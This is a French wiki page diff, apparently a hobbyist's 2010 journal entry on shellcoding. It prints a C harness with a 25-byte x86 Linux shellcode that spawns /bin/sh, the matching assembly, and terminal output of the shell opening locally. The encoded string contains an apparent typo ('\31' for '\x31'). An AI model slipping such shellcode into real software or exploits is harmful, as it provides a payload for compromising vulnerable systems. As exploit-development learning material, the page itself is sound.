« Hiteck » : différence entre les versions
Aucun résumé des modifications |
Aucun résumé des modifications |
||
| Ligne 11 : | Ligne 11 : | ||
*http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *<br /> | *http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *<br /> | ||
* Disponible sur les canals de #hackbbs et #hzv *<br /> | * Disponible sur les canals de #hackbbs et #hzv *<br /> | ||
*************************************************************************/<br /> | *************************************************************************/<br /><br /> | ||
#include <stdio.h><br /><br /> | #include <stdio.h><br /><br /> | ||
char shellcode[] = "\x31\xc0\ | char shellcode[] = "\x31\xc0\31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";<br /><br /> | ||
int main(void)<br /> | int main(void)<br /> | ||
| Ligne 24 : | Ligne 25 : | ||
printf("***********************\n");<br /> | printf("***********************\n");<br /> | ||
(*(void(*)()) shellcode)();<br /> | (*(void(*)()) shellcode)();<br /> | ||
}<br /> | }<br /><br /> | ||
hiteck@hiteck:~/Bureau/exploits$ cat shell.s<br /> | hiteck@hiteck:~/Bureau/exploits$ cat shell.s<br /><br /> | ||
main:<br /> | main:<br /> | ||
xorl %eax,%eax<br /> | xorl %eax,%eax<br /> | ||
xorl %edx,%edx<br /> | xorl %edx,%edx<br /> | ||
push %edx<br /> | push %edx<br /> | ||
| Ligne 39 : | Ligne 38 : | ||
mov %esp,%ecx<br /> | mov %esp,%ecx<br /> | ||
mov $11,%al<br /> | mov $11,%al<br /> | ||
int $0x80 | int $0x80<br /> | ||
hiteck@hiteck:~/Bureau/exploits$ ./exploit<br /> | hiteck@hiteck:~/Bureau/exploits$ ./exploit<br /> | ||
| Ligne 45 : | Ligne 44 : | ||
* Shellcode by hit3ck *<br /> | * Shellcode by hit3ck *<br /> | ||
***********************<br /> | ***********************<br /> | ||
* taille : | * taille : 25 *<br /> | ||
***********************<br /> | ***********************<br /> | ||
$ whoami<br /> | $ whoami<br /> | ||
hiteck<br /> | hiteck<br /> | ||
$ echo " | $ echo "Shellcode reussi :-D"<br /> | ||
Shellcode reussi :-D<br /> | |||
$ exit<br /> | $ exit<br /> | ||
hiteck@hiteck:~/Bureau/exploits$<br /> | hiteck@hiteck:~/Bureau/exploits$ <br /> | ||
A la prochaine :-D | A la prochaine :-D | ||
</p> | </p> | ||
Version du 18 juin 2010 à 14:00
Shellcoding
Vendredi 18 juin 2010 :
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D
hiteck@hiteck:~/Bureau/exploits$ cat exploit.c
/************************************************************************
* Shellcode cree par hit3ck *
* Pour tous renseignement : *
*http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *
* Disponible sur les canals de #hackbbs et #hzv *
*************************************************************************/
#include <stdio.h>
char shellcode[] = "\x31\xc0\31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
printf("***********************\n");
printf("* Shellcode by hit3ck *\n");
printf("***********************\n");
printf("* taille : %d *\n",sizeof(shellcode)-1);
printf("***********************\n");
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/exploits$ cat shell.s
main:
xorl %eax,%eax
xorl %edx,%edx
push %edx
push $0x68732f6e
push $0x69622f2f
mov %esp,%ebx
push %edx
push %ebx
mov %esp,%ecx
mov $11,%al
int $0x80
hiteck@hiteck:~/Bureau/exploits$ ./exploit
***********************
* Shellcode by hit3ck *
***********************
* taille : 25 *
***********************
$ whoami
hiteck
$ echo "Shellcode reussi :-D"
Shellcode reussi :-D
$ exit
hiteck@hiteck:~/Bureau/exploits$
A la prochaine :-D